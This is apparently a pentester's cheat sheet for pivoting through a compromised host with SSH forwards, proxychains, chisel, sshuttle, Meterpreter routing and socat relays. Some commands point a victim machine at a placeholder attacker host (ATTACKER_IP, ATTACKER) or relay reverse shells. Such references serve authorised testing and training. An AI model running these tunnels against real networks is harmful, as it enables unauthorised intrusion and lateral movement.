SSH Pivoting (Local & Remote Forwards)
Local Port Forward (access internal service from Kali)
ssh -L 8888:internal_host:80 user@pivot_host
Access
http://localhost:8888
on Kali → forwards to
internal_host:80viapivot_host.
Remote Port Forward (expose service from Kali to pivot)
ssh -R 4444:127.0.0.1:4444 user@pivot_host
Pivot host can now reach Kali's
4444(e.g., for reverse shell listener).
Dynamic Proxy (SOCKS5)
ssh -D 9050 user@pivot_host
Use with proxychains to route tools through the tunnel:
proxychains nmap -sT -Pn -p 80 internal_host
Chisel (TCP tunnel via HTTP)
Attacker (listener):
chisel server -p 8000 --reverse
Victim (reverse tunnel):
chisel client ATTACKER_IP:8000 R:1080:127.0.0.1:1080
Now attacker can access the victim’s
127.0.0.1:1080via their ownlocalhost:1080.
SSH over Netcat (when no SSH binary available)
# On target:
mkfifo /tmp/pipe; nc ATTACKER 2222 0</tmp/pipe | ssh user@pivot_host 1>/tmp/pipe
SSHuttle (easy transparent routing)
# Full internal access routing via SSH
sshuttle -r user@pivot_host 10.10.10.0/24
Now tools like
nmap,curl, etc. work transparently against internal targets.
Socks Proxies + Proxychains
Confirm SOCKS setup with:
proxychains curl http://internal_host
Edit
/etc/proxychains.confand ensure:
[ProxyList]
socks5 127.0.0.1 9050
Meterpreter Route + Socks
# In Meterpreter session
run autoroute -s 10.10.10.0/24
# Background meterpreter shell, then:
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
Use proxychains with
socks4 127.0.0.1 1080for tool routing.
Port Forwarding via Metasploit
# Forward local port 8080 to internal 10.10.10.10:80
portfwd add -l 8080 -p 80 -r 10.10.10.10
Now browse
http://localhost:8080
to reach the internal host.
Socat Relays (custom tunnels)
# Simple reverse shell relay
socat TCP-LISTEN:4444,fork TCP:10.10.10.10:22
# Reverse SOCKS tunnel
socat TCP-LISTEN:1080,fork SOCKS4A:127.0.0.1:internal:80,socksport=9050